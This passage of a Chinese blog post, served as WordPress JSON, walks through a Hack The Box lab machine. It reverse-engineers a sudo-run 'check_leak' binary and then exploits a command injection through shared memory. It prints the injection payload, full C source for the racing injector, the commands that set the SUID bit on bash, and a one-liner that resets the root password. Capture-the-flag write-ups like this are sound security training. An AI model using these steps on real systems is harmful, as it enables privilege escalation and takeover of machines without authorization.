60<\/code>\u884c\u3002\u9996\u5148\uff0c\u7a0b\u5e8f\u83b7\u53d6\u4e86\u5f53\u524d\u65f6\u95f4\u6233<code>current_timestamp_1<\/code>\uff0c\u5e76\u4f7f\u7528\u5176\u4f5c\u4e3a\u968f\u673a\u6570\u79cd\u5b50\uff0c\u901a\u8fc7<code>rand()<\/code>\u751f\u6210\u4e86\u968f\u673a\u6574\u6570\uff0c\u5e76\u5c06\u968f\u673a\u6570\u548c<code>0xFFFFF<\/code>\u4f5c\u4e86\u53d6\u4f59\u8fd0\u7b97\u64cd\u4f5c\uff0c\u5c06\u8fd0\u7b97\u7ed3\u679c\u7684<code>16<\/code>\u8fdb\u5236\u503c\u4f5c\u4e3a\u4e86<code>Linux<\/code>\u5171\u4eab\u5185\u5b58\u7684\u7d22\u5f15\u5730\u5740\u503c\uff0c\u521b\u5efa\u5e76\u8fde\u63a5\u4e86\u5171\u4eab\u5185\u5b58\u7a7a\u95f4\u3002<strong><span style=\"color: #df2a3f; background-color: #fbde28;\">\uff08\u6bd4\u5982\uff0c\u7a0b\u5e8f\u4e8e2020\u5e741\u67081\u65e519:00:00\u8fdb\u884c\u4e0a\u8ff0\u64cd\u4f5c\uff0c\u5219\u65f6\u95f4\u6233\u4e3a1577876400\uff0crand()\u51fd\u6570\u7ed3\u679c\u4e3a1273327832\uff0c\u5171\u4eab\u5185\u5b58\u5730\u5740\u5c31\u4e3a0x26b98\uff09<\/span><\/strong><\/p>\n<p>\u63a5\u7740\uff0c\u7a0b\u5e8f\u53c8\u83b7\u53d6\u4e86\u65f6\u95f4\u6233<code>current_timestamp_2<\/code>\uff0c\u5e76\u4f7f\u7528<code>ctime()<\/code>\u51fd\u6570\u5c06\u5176\u8f6c\u6362\u4e3a\u6807\u51c6\u65f6\u95f4\u5b57\u7b26\u4e32<code>current_time_string<\/code>\uff0c\u7136\u540e\u5c06\u8be5\u53d8\u91cf\u548c\u4f20\u5165\u54c8\u5e0c\u503c\u683c\u5f0f\u5316\u4e3a\u5982\u4e0b\u5b57\u7b26\u4e32\uff1a<\/p>\n<pre><code class=\"language-plain\">Leaked hash detected at {Time String} &gt; {Hash}n<\/code><\/pre>\n<p>\u683c\u5f0f\u5316\u5b8c\u6bd5\u540e\uff0c\u5c31\u5c06\u5b57\u7b26\u4e32\u5199\u5165\u4e86\u5171\u4eab\u5185\u5b58\u4e2d\uff0c\u5e76\u4f7f\u7528<code>return<\/code>\u8fd4\u56de\u5171\u4eab\u5185\u5b58\u5730\u5740\u3002<\/p>\n<p>\u8fd4\u56de\u7ee7\u7eed\u770b<code>main()<\/code>\u51fd\u6570\u3002\u5f53\u6210\u529f\u63a5\u6536\u5230\u5171\u4eab\u5185\u5b58\u5730\u5740<code>shm_location<\/code>\u540e\uff0c\u7a0b\u5e8f\u4f1a\u5c06\u5176\u5730\u5740\u503c\u6253\u5370\uff0c\u968f\u540e\u6682\u505c\u6267\u884c<code>1<\/code>\u79d2\uff0c\u63a5\u7740\u53c8\u5c06\u6570\u636e\u5e93\u51ed\u636e\u53d8\u91cf\u548c<code>shm_location<\/code>\u4f20\u5165\u4e86<code>notify_user()<\/code>\u51fd\u6570\u4e2d\u8c03\u7528\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740552473916-500c3cd2-d86a-40fa-82af-a1a607def8e5.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-c\">unsigned __int64 __fastcall notify_user(\n        __int64 db_host,\n        const char *db_user,\n        const char *db_pass,\n        const char *db_name,\n        unsigned int shm_location)\n{\n  unsigned __int64 v5; \/\/ r12\n  __int64 v6; \/\/ rax\n  _DWORD *v7; \/\/ rbx\n  int v8; \/\/ edx\n  _BYTE *v9; \/\/ rdx\n  unsigned int shmid; \/\/ [rsp+30h] [rbp-1F0h]\n  int command_buffer; \/\/ [rsp+34h] [rbp-1ECh]\n  char *haystack; \/\/ [rsp+38h] [rbp-1E8h]\n  const char *hash_exist_flag_ptr; \/\/ [rsp+40h] [rbp-1E0h]\n  char *pipechar_location_shm_ptr; \/\/ [rsp+48h] [rbp-1D8h]\n  const char *database_hash; \/\/ [rsp+50h] [rbp-1D0h]\n  char *command; \/\/ [rsp+60h] [rbp-1C0h]\n  FILE *stream; \/\/ [rsp+68h] [rbp-1B8h]\n  char *v22; \/\/ [rsp+70h] [rbp-1B0h]\n  char *ptr; \/\/ [rsp+78h] [rbp-1A8h]\n  char v24[376]; \/\/ [rsp+80h] [rbp-1A0h] BYREF\n  unsigned __int64 v25; \/\/ [rsp+1F8h] [rbp-28h]\n\n  v5 = (unsigned __int64)v24;\n  if ( _asan_option_detect_stack_use_after_return )\n  {\n    v6 = __asan_stack_malloc_3(352LL);\n    if ( v6 )\n      v5 = v6;\n  }\n  *(_QWORD *)v5 = 1102416563LL;\n  *(_QWORD *)(v5 + 8) = \"1 32 256 17 result_buffer:171\";\n  *(_QWORD *)(v5 + 16) = notify_user;\n  v7 = (_DWORD *)(v5 &gt;&gt; 3);\n  v7[536862720] = -235802127;\n  v7[536862729] = -202116109;\n  v7[536862730] = -202116109;\n  v25 = __readfsqword(0x28u);\n  shmid = shmget(shm_location, 0LL, 438);\n  if ( shmid == -1 )\n  {\n    printf(\"No shared memory segment found for the given address: 0x%Xn\", shm_location);\n    goto ERROR_NO_SHM_MEMORY;\n  }\n  haystack = (char *)shmat(shmid, 0LL, 0);\n  if ( haystack == (char *)-1LL )\n  {\n    if ( *(_BYTE *)(((unsigned __int64)&amp;stderr &gt;&gt; 3) + 0x7FFF8000) )\n      __asan_report_load8(&amp;stderr);\n    fprintf(\n      stderr,\n      \"Unable to attach to shared memory segment with ID %d. Please check if the segment is accessible.n\",\n      shmid);\n    goto ERROR_NO_SHM_MEMORY;\n  }\n  hash_exist_flag_ptr = strstr(haystack, \"Leaked hash detected\");\n  if ( !hash_exist_flag_ptr )\n  {\n    puts(\"No hash detected in shared memory.\");\n    goto ERROR_NO_HASHFLAG_FOUND;\n  }\n  pipechar_location_shm_ptr = strchr(hash_exist_flag_ptr, '&gt;');\n  if ( !pipechar_location_shm_ptr )\n  {\n    puts(\"Malformed data in the shared memory.\");\nERROR_NO_HASHFLAG_FOUND:\n    if ( shmdt(haystack) == -1 )\n      perror(\"shmdt\");\n    unsetenv(\"MYSQL_PWD\");\n    goto ERROR_NO_SHM_MEMORY;\n  }\n  database_hash = trim_bcrypt_hash(pipechar_location_shm_ptr + 1);\n  if ( setenv(\"MYSQL_PWD\", db_pass, 1) )\n  {\n    perror(\"setenv\");\n    shmdt(haystack);\n    v8 = 0;\n  }\n  else\n  {\n    command_buffer = snprintf(\n                       0LL,\n                       0LL,\n                       \"mysql -u %s -D %s -s -N -e 'select email from teampass_users where pw = \"%s\"'\",\n                       db_user,\n                       db_name,\n                       database_hash);\n    command = (char *)malloc(command_buffer + 1);\n    if ( command )\n    {\n      snprintf(\n        command,\n        command_buffer + 1,\n        \"mysql -u %s -D %s -s -N -e 'select email from teampass_users where pw = \"%s\"'\",\n        db_user,\n        db_name,\n        database_hash);\n      stream = popen(command, \"r\");\n      if ( stream )\n      {\n        if ( fgets((char *)(v5 + 32), 256, stream) )\n        {\n          pclose(stream);\n          free(command);\n          v22 = strchr((const char *)(v5 + 32), 10);\n          if ( v22 )\n          {\n            if ( *(_BYTE *)(((unsigned __int64)v22 &gt;&gt; 3) + 0x7FFF8000) != 0\n              &amp;&amp; ((unsigned __int8)v22 &amp; 7) &gt;= *(_BYTE *)(((unsigned __int64)v22 &gt;&gt; 3) + 0x7FFF8000) )\n            {\n              __asan_report_store1(v22);\n            }\n            *v22 = 0;\n          }\n          ptr = strdup((const char *)(v5 + 32));\n          if ( ptr )\n          {\n            v9 = (_BYTE *)(v5 + 32);\n            if ( *(_BYTE *)(((v5 + 32) &gt;&gt; 3) + 0x7FFF8000) != 0\n              &amp;&amp; (char)((v5 + 32) &amp; 7) &gt;= *(_BYTE *)(((v5 + 32) &gt;&gt; 3) + 0x7FFF8000) )\n            {\n              __asan_report_load1(v5 + 32);\n            }\n            if ( *v9 )\n              printf(\"User will be notified via %sn\", (const char *)(v5 + 32));\n            free(ptr);\n            v8 = 1;\n          }\n          else\n          {\n            puts(\"Failed to allocate memory for result string\");\n            shmdt(haystack);\n            v8 = 0;\n          }\n        }\n        else\n        {\n          puts(\"Failed to read result from the db\");\n          pclose(stream);\n          free(command);\n          shmdt(haystack);\n          v8 = 0;\n        }\n      }\n      else\n      {\n        puts(\"Failed to execute MySQL query\");\n        free(command);\n        shmdt(haystack);\n        v8 = 0;\n      }\n    }\n    else\n    {\n      puts(\"Failed to allocate memory for command\");\n      shmdt(haystack);\n      v8 = 0;\n    }\n  }\n  memset((void *)(((v5 + 32) &gt;&gt; 3) + 2147450880), 248, 32);\n  if ( v8 == 1 )\n    goto ERROR_NO_HASHFLAG_FOUND;\nERROR_NO_SHM_MEMORY:\n  if ( v24 == (char *)v5 )\n  {\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8000) = 0LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8008) = 0LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8010) = 0LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8018) = 0LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8020) = 0LL;\n    *(_DWORD *)((v5 &gt;&gt; 3) + 0x7FFF8028) = 0;\n  }\n  else\n  {\n    *(_QWORD *)v5 = 1172321806LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8000) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8008) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8010) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8018) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_QWORD *)((v5 &gt;&gt; 3) + 0x7FFF8020) = 0xF5F5F5F5F5F5F5F5LL;\n    *(_DWORD *)((v5 &gt;&gt; 3) + 0x7FFF8028) = -168430091;\n    **(_BYTE **)(v5 + 504) = 0;\n  }\n  return v25 - __readfsqword(0x28u);\n}<\/code><\/pre>\n<p>\u8be5\u51fd\u6570\u524d\u534a\u90e8\u5206\u7684\u91cd\u70b9\u5728\u7b2c<code>41 - 73<\/code>\u884c\u3002\u5728\u7b2c<code>41 - 47<\/code>\u884c\uff0c\u7a0b\u5e8f\u901a\u8fc7<code>shmget()<\/code>\u548c<code>shmat()<\/code>\u51fd\u6570\u8fde\u63a5\u4e86\u4e4b\u524d\u521b\u5efa\u7684\u5171\u4eab\u5185\u5b58\u7a7a\u95f4\uff0c\u968f\u540e\uff0c\u4f7f\u7528\u5f3a\u5236\u7c7b\u578b\u8f6c\u6362\u83b7\u53d6\u4e86\u4fdd\u5b58\u5728\u5171\u4eab\u5185\u5b58\u5185\u7684\u54c8\u5e0c\u503c\u5b57\u7b26\u4e32\u3002\u63a5\u7740\uff0c\u5728\u7b2c<code>58<\/code>\u884c\uff0c\u901a\u8fc7<code>strstr<\/code>\u51fd\u6570\u83b7\u53d6\u4e86\u5982\u4e0b\u5b57\u7b26\u4e32\u5728\u6574\u4e2a\u54c8\u5e0c\u5b57\u7b26\u4e32\u5185\u7684\u9996\u5b57\u6bcd\u7d22\u5f15\u503c\uff1a<\/p>\n<pre><code class=\"language-c\">Leaked hash detected<\/code><\/pre>\n<p>\u7136\u540e\u5bf9\u51fd\u6570\u8fd4\u56de\u503c\u6267\u884c\u5224\u65ad\uff0c\u82e5\u8fd4\u56de\u7a7a\u503c\u5219\u62a5\u9519\u9000\u51fa\u3002<\/p>\n<p>\u5728\u7b2c<code>64<\/code>\u884c\uff0c\u53c8\u4f7f\u7528<code>strchr<\/code>\u51fd\u6570\uff0c\u83b7\u53d6\u4e86\u54c8\u5e0c\u503c\u5b57\u7b26\u4e32\u5185<code>&lt;<\/code>\u53f7\u7684\u6307\u9488<code>pipechar_location_shm_ptr<\/code>\u3002\u82e5\u8be5\u503c\u4e3a\u7a7a\uff0c\u5219\u62a5\u9519\u9000\u51fa\u3002<\/p>\n<p>\u5728\u51fd\u6570\u4e0b\u534a\u90e8\u5206\uff0c\u53c8\u8c03\u7528\u4e86<code>trim_bcrypt_hash<\/code>\u51fd\u6570\uff0c\u4f20\u5165\u503c\u4e3a\u6307\u9488<code>pipechar_location_shm_ptr<\/code>\u3002\u67e5\u770b\u5176\u5185\u5bb9\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740553582968-b400fa1d-3c38-428c-b492-ef947996ec63.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u51fd\u6570\u9996\u5148\u4f1a\u5faa\u73af\u5224\u65ad\u5f53\u524d\u6307\u9488\u5bf9\u5e94\u5b57\u7b26\u4e32\u662f\u5426\u540c\u65f6\u6ee1\u8db3\u6761\u4ef6\uff1a\u4e0d\u7b49\u4e8e\u7a7a\u683c\u4e14\u4e0d\u7b49\u4e8e\u5927\u4e8e\u53f7\u3002\u82e5\u7b26\u5408\uff0c\u5219\u9000\u51fa\u5faa\u73af\uff0c\u5426\u5219\u5c06<code>pipechar_location_shm_ptr<\/code>\u6307\u9488\u9996\u90e8\u7d22\u5f15\u503c\u52a0<code>1<\/code>\u3002\u968f\u540e\uff0c\u4f1a\u6e05\u9664\u5b57\u7b26\u4e32\u672b\u5c3e\u7684\u5783\u573e\u5b57\u7b26\uff0c\u5e76\u5c06\u5176\u8fd4\u56de\u3002<\/p>\n<p>\u56de\u5230<code>notify_user()<\/code>\u7ee7\u7eed\u5206\u6790\u3002\u5728\u7b2c<code>83 - 100<\/code>\u884c\u5185\uff0c\u53d1\u73b0\u4e86\u547d\u4ee4\u6267\u884c\u654f\u611f\u64cd\u4f5c\u3002\u7a0b\u5e8f\u9996\u5148\u5c06<code>trim_bcrypt_hash<\/code>\u7ed3\u679c\u5b58\u5230\u4e86<code>database_hash<\/code>\u53d8\u91cf\u5185\uff0c\u968f\u540e\u4f7f\u7528<code>db_user<\/code>\u3001<code>db_name<\/code>\u548c<code>database_hash<\/code>\u4e09\u4e2a\u53d8\u91cf\uff0c\u683c\u5f0f\u5316\u5982\u4e0b\u8fdb\u884c\u6570\u636e\u5e93\u67e5\u8be2\u7684<code>Linux<\/code>\u7cfb\u7edf\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-shell\">mysql -u {db_user} -D {db_name} -s -N -e 'select email from teampass_users where pw = \"{database_hash}\"'<\/code><\/pre>\n<p>\u63a5\u7740\u5c31\u4f7f\u7528<code>popen()<\/code>\u51fd\u6570\u6267\u884c\u4e86\u6b64\u6761\u547d\u4ee4\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740554583072-994c936c-61d5-42f6-b561-067f52bb9da4.png\" alt=\"\" \/><\/p>\n<p>\u6267\u884c\u5b8c\u6210\u540e\uff0c\u5c31\u8f93\u51fa\u7ed3\u679c\u8fd4\u56de<code>main()<\/code>\u51fd\u6570\u3002\u5f53<code>notify_user()<\/code>\u6267\u884c\u5b8c\u6bd5\u540e\uff0c\u7a0b\u5e8f\u5c31\u5220\u9664\u4e86\u5171\u4eab\u7a7a\u95f4\u5e76\u9000\u51fa\u4e86\u8fdb\u7a0b\u3002<\/p>\n<h2>Sudo check_leak\u547d\u4ee4\u6ce8\u5165\u63d0\u6743<\/h2>\n<p>\u7eb5\u89c2\u6574\u4e2a<code>check_leak<\/code>\u7a0b\u5e8f\uff0c\u6211\u4eec\u4f3c\u4e4e\u6ca1\u6709\u53ef\u4ee5\u76f4\u63a5\u4ece\u547d\u4ee4\u884c\u5904\u63a7\u5236\u7684\u53d8\u91cf\u3002\u4f46\u7531\u4e8e\u5728<code>Linux<\/code>\u4e2d\uff0c\u7a0b\u5e8f\u521b\u5efa\u7684\u5171\u4eab\u5185\u5b58\u53ef\u4ee5\u88ab\u4efb\u4f55\u8fdb\u7a0b\u81ea\u7531\u8bfb\u53d6\u548c\u5199\u5165\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7a0b\u5e8f\u521b\u5efa\u7684\u5171\u4eab\u5185\u5b58\u5e76\u6ce8\u5165\u6076\u610f\u547d\u4ee4\u3002<\/p>\n<p>\u5728\u5b9e\u9645\u64cd\u4f5c\u4e2d\uff0c\u6bcf\u6b21\u8fd0\u884c\u8be5\u7a0b\u5e8f\uff0c\u7a0b\u5e8f\u751f\u6210\u7684\u5171\u4eab\u5185\u5b58\u5730\u5740\u503c\u90fd\u4e0d\u4e00\u6837\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u7f16\u5199\u4e00\u4e2a\u4e0d\u65ad\u5faa\u73af\u6839\u636e\u5f53\u524d\u65f6\u95f4\u6233\u751f\u6210\u5171\u4eab\u5185\u5b58\u5730\u5740\u503c\uff0c\u8fde\u63a5\u8be5\u5730\u5740\u5e76\u6ce8\u5165\u6076\u610f\u547d\u4ee4\u7684\u7a0b\u5e8f\u3002\u8fd9\u6837\u4e00\u6765\uff0c\u5f53\u6211\u4eec\u4e8b\u5148\u5728\u540e\u53f0\u8fd0\u884c\u6076\u610f\u7a0b\u5e8f\uff0c\u968f\u540e\u6267\u884c<code>check_leak<\/code>\u7a0b\u5e8f\u65f6\uff0c\u7a0b\u5e8f\u5728\u8be5\u65f6\u523b\u751f\u6210\u7684\u5171\u4eab\u5185\u5b58\u5730\u5740\u503c\u4e00\u5b9a\u548c\u540c\u4e00\u65f6\u523b\u6076\u610f\u7a0b\u5e8f\u751f\u6210\u7684\u503c\u76f8\u540c\u3002\u5f53<code>check_leak<\/code>\u7a0b\u5e8f\u6210\u529f\u5411\u5171\u4eab\u5185\u5b58\u5199\u5165\u54c8\u5e0c\u503c\u5e76\u7761\u7720<code>1<\/code>\u79d2\u65f6\uff0c\u6076\u610f\u7a0b\u5e8f\u5c31\u4f1a\u91cd\u65b0\u5411\u5171\u4eab\u5185\u5b58\u5199\u5165\u6076\u610f\u547d\u4ee4\u3002\u8fd9\u6837\u4e00\u6765\uff0c\u5f53<code>check_leak<\/code>\u7684<code>notify_user()<\/code>\u51fd\u6570\u6267\u884c\u65f6\uff0c\u6076\u610f\u547d\u4ee4\u5c31\u4f1a\u88ab\u683c\u5f0f\u5316\u5230<code>mysql<\/code>\u67e5\u8be2\u547d\u4ee4\u5185\u5e76\u88ab\u6267\u884c\u3002<\/p>\n<p>\u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u786e\u5b9a\u6ce8\u5165\u5230\u5171\u4eab\u5185\u5b58\u4e2d\u7684\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-plain\">Leaked hash detected at &gt;';chmod 4755 \/bin\/bash;echo '<\/code><\/pre>\n<p>\u968f\u540e\u5728\u9776\u673a\u4e0a\u7f16\u5199\u5982\u4e0b\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-c\">#include &lt;time.h&gt;\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;sys\/ipc.h&gt;\n#include &lt;sys\/shm.h&gt;\n#include &lt;stdbool.h&gt;\n#include &lt;sys\/types.h&gt;\nint main() {\n    int shmid;\n    int timestamp;\n    char *shm_ptr;\n    unsigned long shm_addr;\n    while(true) {\n        timestamp = time(0LL);\n        srand(timestamp);\n        shm_addr = rand() % 0xFFFFF;\n        shmid = shmget(shm_addr, 0x400uLL, 950);\n        if (shmid == -1) {\n            printf(\"[-] Failed to create shared memory!n\");\n            continue;\n        }\n        printf(\"[*] Shared Memory Address: %xn\", shm_addr);\n        shm_ptr = (char *)shmat(shmid, 0LL, 0);\n        if ( shm_ptr == (char *)-1LL ) {\n            printf(\"[-] Error on opening an shared memory!n\");\n            continue;\n        }\n        snprintf(shm_ptr, 0x400uLL, \"Leaked hash detected at &gt;';chmod 4755 \/bin\/bash;echo '\");\n        printf(\"[+] Malicious command injected!n\");\n        shmdt(shm_ptr);\n    }\n    return 0;\n}<\/code><\/pre>\n<p>\u968f\u540e\u7f16\u8bd1\u8be5\u7a0b\u5e8f\uff0c\u5728\u540e\u53f0\u8fd0\u884c\uff0c\u63a5\u7740\u6267\u884c<code>check_leak.sh<\/code>\uff0c\u6307\u5b9a\u83b7\u53d6<code>bob<\/code>\u7528\u6237\u540d\u54c8\u5e0c\uff0c\u89e6\u53d1\u6076\u610f\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-shell\">gcc inject.c -o inject.elf\n.\/inject.elf &gt; .\/inject.log &amp;\nsudo \/opt\/hash-checker\/check-leak.sh bob<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740557957941-26c62a6e-954d-4664-a18e-c73172394767.png\" alt=\"\" \/><\/p>\n<p>\u4fee\u6539<code>\/bin\/bash<\/code>\u6743\u9650\u6210\u529f\uff01\uff01\u76f4\u63a5\u4fee\u6539<code>root<\/code>\u5bc6\u7801\u5e76\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-shell\">\/bin\/bash -p\npython3 -c \"import os;os.setuid(0);os.setgid(0);os.system('echo 'root:Asd310056' | chpasswd')\"\nexit\nsu -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740558158238-5c930d31-2ea5-4be9-b711-c341bb57f994.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.56 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.11.56 (10.10.11.56)  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-225","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/225","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=225"}],"version-history":[{"count":8,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/225\/revisions"}],"predecessor-version":[{"id":233,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/225\/revisions\/233"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=225"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=225"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=225"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}